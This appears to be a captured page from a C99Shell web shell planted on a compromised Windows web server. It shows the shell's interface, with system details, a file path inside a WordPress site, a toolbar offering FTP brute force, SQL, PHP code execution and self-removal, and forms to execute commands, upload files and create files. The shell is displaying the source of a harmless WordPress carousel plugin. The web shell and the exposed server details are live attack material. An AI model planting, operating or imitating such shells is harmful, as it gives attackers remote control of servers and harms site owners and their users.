!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\carousel-without-jetpack\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     carousel-without-jetpack.php (2.25 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* 
Plugin Name: Gallery Carousel Without JetPack
Plugin URI: http://www.wpbeginner.com/
Description: Transform your standard galleries into an immersive full-screen experience without requiring you to connect to WordPress.com
Version: 0.7.4
Author: Syed Balkhi
Author URI: http://www.wpbeginner.com
License: GPLv2 or later
License URI: http://www.gnu.org/licenses/gpl-2.0.html
*/


/**
* This is a fork of Carousel Module from JetPack. I just wanted the Carousel to work
* without logging into WordPress.com because I shouldn't be forced to (that's evil). So I'm releasing
* this little plugin which is exactly the copy of JetPack module. I will update this plugin everytime that JetPack updates.
*/

/**
* Boostrap 'carousel' module so it'll work standalone
*/
class CarouselWithoutJetpack {
    
/**
    * Constructor
    */
    
function CarouselWithoutJetpack() {
        
// Plugin Details
        
$this->plugin = new stdClass;
        
$this->plugin->name 'carousel-without-jetpack'// Plugin Folder
        
$this->plugin->folder WP_PLUGIN_DIR.'/'.$this->plugin->name// Full Path to Plugin Folder
        
$this->plugin->url WP_PLUGIN_URL.'/'.str_replace(basename__FILE__),"",plugin_basename(__FILE__)); // Full URL to Plugin Folder

        // Include class.jetpack-options.php
        // Ignore if Jetpack or another plugin has already done this
        
if (!class_exists('No_Jetpack_Options')) {
            require_once(
$this->plugin->folder.'/carousel/class.jetpack-options.php');
        }
        
        
// Include No_Jetpack_Carousel
        // Ignore if Jetpack or another plugin has already done this
        
if (!class_exists('No_Jetpack_Carousel')) {
            require_once(
$this->plugin->folder.'/carousel/jetpack-carousel.php');
        }        
        
        
add_action('wp_enqueue_scripts', array(&$this'frontendScriptsAndCSS'));
        
add_action('plugins_loaded', array(&$this'loadLanguageFiles'));
    }
    
    
/**
    * Enqueue jQuery Spin
    */
    
function frontendScriptsAndCSS() {
        
wp_register_script'spin'plugins_url'carousel/spin.js'__FILE__ ), false );
        
wp_register_script'jquery.spin'plugins_url'carousel/jquery.spin.js'__FILE__ ) , array( 'jquery''spin' ) );
    }

    
/**
    * Load translations
    */
    
function loadLanguageFiles() {
        
load_plugin_textdomain('carousel'falsebasenamedirname__FILE__ ) ) . '/languages' );        
    }
}

new 
CarouselWithoutJetpack;

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--